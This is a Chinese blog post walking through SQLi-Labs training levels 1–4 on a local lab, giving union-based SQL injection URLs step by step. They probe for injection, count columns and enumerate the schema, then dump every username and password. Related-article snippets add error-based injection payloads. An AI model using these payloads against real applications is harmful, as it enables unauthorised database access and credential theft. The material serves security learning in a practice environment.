SQLI-LAB靶场 基于union报错注入 (1~4)

最新推荐文章于 2024-05-26 21:07:50 发布
最新推荐文章于 2024-05-26 21:07:50 发布
阅读量3.7k 收藏 1
点赞数 2
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52742521/article/details/121410501
版权

第一关

首先在第一关的配置文件中添加

echo $sql;

echo "<br>";

这样可以在页面上显示sql语句(在每一关闯关的时候都记得修改配置文件,以后就不再提醒了) 是为了刚方便理解哈

 

配置好之后我们打开phpstudy,在火狐浏览器中打开sql的第一关。

闯关步骤如下

  • 1. http://127.0.0.1/sqli/Less-1/?id=1'   查看是否有注入
  • 2.   http://127.0.0.1/sqli/Less-1/?id=1' order by 3--+   查看有多少列
  • 3.  http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3--+ 查看哪些数据可以回显
  • 4. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,database()--+  查看当前数据库
  • 5. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,schema_name from information_schema.schemata limit 4,1--+  查看数据库security,或者是:   http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 查看所有的数据库
  • 6. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表,或者是:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的表(此处需要将security变成16进制数字)
  • 7. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,column_name from information_schema.columns where table_name=0x7573657273--+ 查询列信息,或者是:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+ 查看所以的列信息
  • 8. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,concat_ws('~',username,password) from security.users limit 1,1--+ 查询一个账号和密码,或者是:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+ 直接可以得到所有的账号和密码,并且使用~符号进行分割。

 按照上述步骤最后得到所有的用户名和密码。

函数contact ws('~',A,B)的意思是一个用户名一个密码的显示,中间以波浪号隔开。

 

 第二关

  第二关和第一关相似

 闯关步骤如下:

  • 1.  http://127.0.0.1/sqli/Less-2/?id=1'     查看是否有注入
  • 2.   http://127.0.0.1/sqli/Less-2/?id=1 order by 3--+   查看有多少列
  • 3.  http://127.0.0.1/sqli/Less-1/?id=-1 union select 1,2,3--+ 查看哪些数据可以回显
  • 4. http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+ 查看所有数据库
  • 5. http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+查看所有的表
  • 6.  http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+查看所有的列信息
  • 7. http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+直接可以得到所有的账号和密码,并且使用~符号进行分割。

  

第三关

  • 1. http://127.0.0.1/sqli/Less-3/?id=1' 查看是否有注入
  • 2. http://127.0.0.1/sqli/Less-3/?id=1') order by 3--+ 查看有多少列
  • 3. http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2, group_concat(schema_name) from information_schema.schemata --+ 查看所有数据库
  • 6. http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+查看所有的表
  • 7. http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2, group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+查看所有的列信息
  • 8.  http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2, group_concat(concat_ws(0x7e,username,password)) from security.users --+直接可以得到所有的账号和密码,并且使用~符号进行分割。

 第四关

  • 1. http://127.0.0.1/sqli/Less-4/?id=1"查看是否有注入
  • 2. http://127.0.0.1/sqli/Less-4/?id=1") order by 3--+查看有多少列
  • 3. http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2, group_concat(schema_name) from information_schema.schemata --+查看所有数据库
  • 6. http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+查看所有的表
  • 7. http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2, group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+查看所有的列信息
  • 8. http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2, group_concat(concat_ws(0x7e,username,password)) from security.users --+直接可以得到所有的账号和密码,并且使用~符号进行分割。

     
北蓦.
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLI-LIBS靶场五-报错注入
qq_66291050的博客
05-18 158
less-5没有显存位了,不能使用联合查询,也就是说明UNION SELECT 1,2,3其中的1,2,3是不会被显示在网页返回的文字中。从靶场二跳到靶场五是因为其中真的没什么好讲的,把源码拿出来搞一个ECHO $sql 就可以在注入的时候看到执行语句的过程。这样写就差不多,当然了,细心的就会发现为什么是双引号闭合?首先,我们要了解一个MYSQL里面的UPDATEXML函数。发现是单引号,那么我们就用单引号闭合这个语句。这样写的,但是我发现,我这里是根本行不通的。剩下的我也懒得说,就这样。
sqli靶场——【Less-5】报错注入
weixin_63082823的博客
09-14 485
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a; 以上语句可以简化成如下的形式: select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
自己收集的一些常见SQL注入方式(持续更新中,增加了无列名注入和Timing Attack注入)
sGanYu
10-19 2048
目录 注入点位置及发现 判断输入点是否存在注入测试 数值型: 字符型: group_concat注入: union注入: limit注入: 报错注入: 布尔注入: 时间注入: 堆查询注入: 宽字节注入: base64注入: Cookie注入、Referer注入、UA注入、XFF注入 预编译注入: Handler注入(从表名查询字段名): SQL绕过WAF 通过SQL语句读写文件 注入点位置及发现: GET参数注入 POST参数注入 use.
sql-labs靶场环境搭建(手把手保姆级教学)
最新发布
焦虑的焦虑
05-26 2095
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
sql-lab靶场讲解
CN天狼
12-16 5507
sql-lab讲解
【实训04】数据库SQL注入漏洞
qq_62277763的博客
10-17 1778
【实训04】数据库SQL注入漏洞
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
SQLi-Lab:每个SQL注入实验室
03-29
SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范这种攻击非常有帮助。 在"SQLi-Lab:每个SQL注入实验室"中,你可以期待以下的知识点: 1. **SQL注入基础**:了解SQL注入的基本原理,包括如何...
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4216
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
Sqli-lab注入靶场
weixin_43355264的博客
12-07 859
Sqli-lab注入靶场 1-10笔记 Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 方法一:手工UNION联合查询注入 1.输入单引号,页面报错,如下图所示。 2.访问id= 1’ and 1 = 1,由于and 1 = 1为真,所以页面应返回与id=1相同的结果,如下图所示,访问id = 1’ and...
sqli-labs之报错注入练习笔记
haha516130的博客
06-11 347
http://localhost/sqli-labs-master/Less-11/ 输入: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) # ' and updatexml(1,concat(0x7e,(select database()),0x7e),1) # updatexml()函数的格式为:updatexml (xml_document, XPath_string, new_value); 参数:xml_document是Str
sqli_labs闯关
weixin_45808483的博客
10-27 489
less-1 http://127.0.0.1/sqli-labs/Less-1/?id=1 // 加单引号,查看是否有注入 http://127.0.0.1/sqli-labs/Less-1/?id=1' //查看有多少列 http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ // 使id=-1报错,使用联合查找查看那些数据可以回显 http://127.0.0.1/sqli-labs/Less-1/?id=-1' union
sql-lab靶场初级
lee_maple的博客
11-05 426
1.配置环境(PHPstudy) ①打开PHPstudy新建网站 ②需要注意修改php版本和端口(),否则会报错③将含有sql题目的文件放到此目录下
sqli-labs靶场搭建过程及报错解决方法
D1stiny的博客
06-01 3174
下载后放在www目录下,我这里用的是phpstudy_pro 修改数据库密码 运行时结果是这样的 查了好多资料说是php的版本不能超过5.5,我看了一下,也没超过5.5啊 然后我就去修改靶场代码,都修改了依旧报错 折腾好久后发现php的版本根本就不能看上面那个位置,应该是看这个位置,也是在这里安装更多的php版本 修改后成功 如果我用的是phpstudy2018或者wamp的话就没这么多毛病了。。。 ...
SQL注入-安全狗apache绕过
遇事不决冲冲冲
05-26 2538
环境配置 Windows 10 phpstudy sqli-labs靶场 安全狗apache4.0.30255
sqli-lab教程Less-6
Brucye
03-23 407
less-6 sqli-lab通过各种方式(整型注入,字符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 此关运用报错注入 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:selec
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值